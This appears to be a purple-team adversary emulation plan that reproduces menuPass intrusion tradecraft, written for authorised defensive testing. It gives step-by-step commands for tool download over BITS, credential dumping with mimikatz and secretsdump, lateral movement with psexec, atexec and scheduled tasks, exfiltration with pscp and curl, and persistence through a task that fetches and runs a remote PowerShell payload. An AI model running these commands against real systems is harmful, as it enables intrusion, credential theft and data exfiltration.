The menuPass adversary emulation plan is comprised of two scenarios. These scenarios were designed to be representative of the common corpus of publicly available reporting attributed to menuPass. Each organization can tailor this emulation to their individual use case, priorities, and available resources. Reconnaissance, resource development, and initial access considerations have been included for your consideration, and while relevant, are not necessary to remain operationally representative.
Scenario 1 is designed to emulate activity attributed to menuPass that is specific to the group's efforts targeting MSP subscriber networks. Initial access could be achieved by either spearphishing or an assumed breach in which the emulation team is granted access to the environment using VPN, RDP, and elevated credentials. menuPass is widely reported to have accessed customer networks from MSP networks using elevated credentials. In pursuing an assumed breach scenario, you will be assessing the ability to protect, detect, and respond to execution, credential access, lateral movement, and exfiltration. Your goal for Scenario 1 is to access a host, upload an operational toolkit, identify systems for staging and persistence, identify systems that may contain data that would be of interest to an adversary, harvest additional credentials, move laterally to systems of interest, and ultimately exfiltrate data, real or simulated. To make the most of this scenario, consider information within your environment that would be sought after by an adversary, identify the most likely attack paths, and determine the feasibility of pursuing these attack paths.
This emulation plan recommends procedures using tools reported to have been used by menuPass actors. In some instances, assumptions have been made regarding tool syntax to account for intelligence gaps. menuPass is reported to have used several different procedures to achieve similar objectives. For the purpose of this emulation plan, we have selected one example and have presented the alternatives as "Alternative Procedures."
- Emulating menuPass using VPN/RDP to access the environment and tools like tcping, netsess, mimikatz, psexec, and pscp to achieve tactical objectives with the operational intent of exfiltrating data.
- Scenario 1 begins after a host is compromised/accessed and the operational toolkit is deployed.
- The purpose of Scenario 1 is to assess your organization's ability to protect, detect, and defend tool ingress, discovery, credential harvesting, lateral movement, and exfiltration.
- You have either ownership of, or explicit authority and/or authorization to operate against the target network.
- You have established your operational infrastructure.
- You have acquired and compiled your operational toolkit
- Step 1 - Initial Access
- Step 2 - Command and Control
- Step 3 - Discovery
- Step 4 - Credential Access
- Step 5 - Lateral Movement
- Step 6 - Collection
- Step 7 - Exfiltration
- Step 8 - Execution
- Step 9 - Persistence
menuPass is perhaps best known for what has been referred to as "Operation Cloud Hopper."4 7 This activity is believed to have spanned from 2014-2018 and initially resulted in the compromise of several of the world's largest Managed Service Providers (MSP). Ultimately, these MSP's were not the final objective. menuPass would leverage its previously attained access to MSP networks to pivot into customer networks that aligned with the group's collection objectives.
To do so, after gaining access to the MSP network, menuPass actors are reported to have sought out shared infrastructure. menuPass actors are thought to have initially breached customer networks by using elevated MSP or subscriber domain credentials and remote access applications.4 Emulating initial access can be as simple as providing the emulation team with a VPN/RDP connection. menuPass is reported to have initially accessed MSP subscriber networks with elevated permissions, so too should the emulation team.4
2.A - Ingress Tool Transfer (T1105)
menuPass is reported to have used BITSAdmin to transfer tools from external infrastructure to hosts in the victim's network. The tools were reported to have been dropped in C:\ProgramData\temp and C:\ProgramData\media.10
Prior to transferring tools to the foothold, ensure they are compiled (if required) and renamed accordingly (optional). For this step, you should consider transferring secretsdump, atexec, psexec, nbtscan, netsess, tcping, nmap, winrar, pscp, and curl.
C:\users\CVNX> powershell.exe
PS C:\users\CVNX> Start-BitsTransfer -Source #{ } -Destination #{ }Example:
PS C:\users\CVNX> Start-BitsTransfer -Source http://123.456.7.89/TWUEGJDITXAONVPUOWFV -Destination C:\ProgramData\temp\TWUEGJDITXAONVPUOWFV3.A - System Network Connections Discovery (T1049)
List network connections to or from the compromised system.
C:\users\CVNX> net use3.B - Remote System Discovery (T1018)
Identify remote systems using net.
C:\users\CVNX> net view /domain3.C - Remote System Discovery (T1018)
Detect.vbs
menuPass is reported to have packaged it's network reconnaissance tools in "detect.vbs." When executed, the base64 encoded file decodes itself using certutil and drops "subnet.exe" and "rund1132.exe" (tcping) to the current working directory.7 To emulate this activity, we suggest conducting remote system discovery, and using tcping to conduct network service scanning. Reporting indicates that menuPass is specifically interested in identifying the status of ports 445 and 3389 for the purpose of lateral movement.
Example:
PS C:\> Test-NetConnection 192.0.2.103.D - Network Service Scanning (T1046)
menuPass has used tcping, renamed to rund1132.exe, to identify and query the status of remote hosts on ports 445 and 3389.7
"#{tcping_local_path}"\tcping.exe "#{tcping_remote_ip}" "#{tcping_remote_port}"Example:
tcping.exe 192.0.2.10 4453.E - System Network Configuration Discovery (T1016)
menuPass has used nbtscan (nbt.exe) to scan for nameservers.7
nbtscan
"#{nbtscan_local_path}"\nbtscan.exe "#{nbt_ip_range}"Example:
nbtscan.exe 192.0.2.10/243.F - System Network Configuration Discovery (T1016)
menuPass has used netsess to enumerate NetBIOS sessions.7
NetSess
"#{netsess_local_path}"\netsess.exe "#{netsess_remote_ip}"Example:
netsess.exe 192.0.2.10menuPass is thought to have initially accessed target environments using compromised credentials that granted elevated privileges.4 As such, privilege escalation was not necessary. menuPass is reported to have sought access to additional credentials to ensure freedom of movement throughout the domain.4
The following procedures require elevated privileges.
4.A - OS Credential Dumping: LSASS Memory (T1003.001), Security Account Manager (T1003.002), LSA Secrets (T1003.004)
menuPass actors are reported to have used Mimikatz locally to gain access to additional credentials. In some instances, Mimikatz was reported to have been uploaded to the compromised host and used to dump credentials from memory. 10 In other instances, menuPass actors are reported to have sideloaded Mimikatz with various binaries. 7 Mimikatz requires elevated privileges.
"#{mimikatz_local_path}"\mimikatz.exe
mimikatz# privilege::debug
mimikatz# log gggg.log
mimikatz# sekurlsa::logonpasswordsSecretsdump.py of the Impacket framework was compiled to secretsdump.exe and used to dump credentials remotely.7
"#{secretsdump_local_path}"\secretsdump.exe #{Domain}/#{User}:#{Password}@#{Ip Address}Example:
secretsdump.exe domain/CVNX:password123!@123.456.78.9menuPass lateral movement can be interpreted as having the following steps: access, deployment, execution, control. By this point in the operation, menuPass actors are elevated, have ingressed tools, performed discovery, and harvested additional credentials to ensure freedom of movement throughout the domain. These legitimate but compromised credentials will be coupled with tools indicative of administrative funtion to either simulate exfiltration, or remotely access a host to deploy and run a lightweight implant, thereby establishing control.
An example of this work-flow is in reporting that indicates menuPass actors have used harvested credentials to access the domain controller, deploy Trochilus, and ultimately copy the NTDS.dit file. The .dit file was staged, compressed and exfiltrated to attacker-controlled infrastructure.11
menuPass is reported to have accessed remote hosts via RDP, PsExec, Atexec, or mapping network shares.4 7 10 These work flows are described in the scenarios listed below. They are not, however, intended to be mutually exclusive. We suggest attempting different methods of access and execution.
5.A - System Services: Service Execution (T1569.002)
menuPass appears to have used different versions of the PsExec tool to achieve the same purpose, remote code execution. Reporting indicates the attackers may have used Sysinternals PsExec and a compiled version of Impacket's psexec.py.5 7 12
"#{psexec_local_path}"\psexec.exe "#{domain}"\"#{psexec_user}":"#{psexec_password}"@"#{psexec_remote_host}" "#{psexec_cmd}"Example:
psexec.exe domain\Administrator:badpassword123@192.0.2.10Alternative Procedure 1: Remote Services - Remote Desktop Protocol (T1021.001)
menuPass has used RDP to move laterally.4 7 RDP grants the attacker console access to a remote host. This access can be leveraged to deploy tactical malware. There are a number of ways by which the implant could be executed, but this example will detail how to do so using WMI.
- Access - Access the remote host via RDP.
mstsc /v #{ip_address}-
Deploy - Upload tactical malware to the remote host via RDP session.
-
Execute - Use wmic to run the implant
wmic /node:#{ip_address} /user:#{"user_name"} /password#{"password"} process call create #{file_to_execute}Alternative Procedure 2: Remote Services - SMB/Windows Admin Shares (T1021.002), Lateral Tool Transfer (T1570)
menuPass is reported to have moved laterally by mounting a network share, copying a file to the mounted share, and creating a scheduled task via Windows Task Scheduler to run the file. After execution, the file was deleted.10
- Access - Mount a Network Share.
net use #{drive}: #{ip_address}\#{drive} #{password} /user:#{domain}\#{user_name}Example: C:\users\CVNX> net use z: \\192.0.2.10\C$ /u:targetdomain\victim badpassword123- Check to ensure the network share is mapped:
net use- Deploy - Copy tactical malware to the mapped network share.
copy #{file} #{drive}\#{destination_dir}
Example: copy #{file} z:\ProgramData\Temp
schtasks /create #{task_name} /tr #{path_of_the_file_to_run} /sc #{schedule} #{user_name} /s #{ip_address}Example: C:\Users\CVNX> schtasks /create /tn WinUpdate /tr C:\ProgramData\Temp\WinUpdate.exe /sc onstart /ru System /s 192.0.2.10- Deleting the mapped network drive:
net use z: /deletemenuPass actors are reported to have used atexec.py, compiled into an executable, to manipulate a remote machine's Task Scheduler and execute commands.7
#{atexec_local_path}\atexec.exe #{domain}\#{username}:#{password}@#{ip_address} #{command}Example: atexec.exe domain\CVNX:'Password123!'@192.0.2.10 whoami6.A - Archive Collected Data - Archive via Utility (T1560.001)
menuPass is thought to have renamed WinRAR to svchost.exe or r.exe, and used it to compress files prior to exfiltration. The compression tools are reported to have been run using the group's renamed version of wmiexec ("t.vbs").7 10
#{rar_local_path}\rar.exe a -hp #{password} #{rar_archive_name} #{rar_files}menuPass Example:
t.vbs r.exe a -hp CVNXPassword aa.rar rar_filesIn the event that WinRAR is unavailable, the following procedures can be used to create archives. Please note that the suggested procedures are not identical to those reported to have been used by menuPass actors and will not result in rar archives. They will however, compress the files for exfiltration using software that is freely available to Windows users.
The following procedure is freely available on Windows 10, build 17063 and later.
tar.exe -a -c -f #{archive_filename} #{files_to_archive}menuPass Example:
tar.exe -a -c -f aa.zip exfil.txtpowershell.exe
Compress-Archive #{files_to_archive} #{archive_filename}menuPass Example:
powershell.exe
Compress-Archive exfil.txt aa.zip6.B - Local Data Staging (T1074.001)
menuPass actors are thought to have staged archives in the Recycle Bin for exfiltration.4
copy #{file_name} C:\$Recycle.Bin\menuPass Example:
C:\Users\CVNX copy aa.rar C:\$Recycle.Bin7.A - Transfer Data to Cloud Account (T1537)
menuPass is reported to have used the PSCP client, renamed to rundll32.exe to exfiltrate data.7
"#{pscp_local_path}"\pscp.exe "#{pscp_exfil_files}" "#{pscp_user}"@"#{pscp_server}":/"#{pscp_drop_location}"menuPass Example:
rundll32.exe aa.rar CVNX@192.0.2.10:/temp/lootmenuPass actors are reported to have used cURL to exfiltrate data to a cloud based storage provider.10
"#{curl_local_path}"\curl.exe -X POST -d #{file} #{exfiltration server}menuPass Example:
CU.exe -X POST -d aa.rar CVNX@192.0.2.10:/temp/loot8.A - Windows Management Instrumentation (T1047)
menuPass used a customized version of wmiexec to run tools and dump credentials. These files are reported to have been dropped to C:\Recovery, C:\Intel, and C:\PerfLogs. 7
For the purpose of this plan, if you choose to assume compromise, we recommend using wmiexec to run whatever tactical implant you will be using.
cscript.exe "#{wmiexec_local_path}"\wmiexec.vbs /shell "#{wmiexec_remote_host}"Example:
cscript.exe C:\Windows\Temp\wmiexec.vbs /shell 192.0.2.10Scheduled Task using Task Scheduler (T1053.005)
menuPass has used atexec.py, compiled to atexec.exe to execute commands on remote hosts through the Task Scheduler service.7
atexec #{domain/username}:#{password}@#{ip address} #{command}Example:
atexec DOMAIN\Administrator:'badpassword123!'@192.0.2.10 systeminfomenuPass is reported to have been selective in persisting malware. They are thought to have persisted sustained malware to specific systems and taken steps to ensure C2 would blend in with normal network communications.
9.A - Scheduled Task (T1053.005)
menuPass is reported to have created scheduled tasks to persist PlugX.4
schtasks /create /sc #{schtask_schedule} /tn #{schtask_taskname} /tr #{schtask_taskrun} /ru #{schtask_username}Example: schtasks /create /sc onlogon /tn WinUpdate /ru System /tr "powershell.exe -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://#{payload_server/#{payload}.ps1'})|iex""Create or Modify System Process - Windows Service (T1543.003)
menuPass is reported to have persisted a PlugX implant by creating a Windows service.5
sc create #{CorWrTool} binPath=#{"\"C:\Windows\vss\vixDiskMountServer.exe\"" start=auto displayname="#{Corel Writing Tools Utility}" type=ownBoot or Logon Autostart Execution - Registry Run Keys (T1547.001)
menuPass is reported to have persisted EvilGrab and RedLeaves by creating a run keys.7
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ctfmon /t REG_SZ /d "c:\users\#{}\#{iechecker.exe}
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ISeC Croot Readr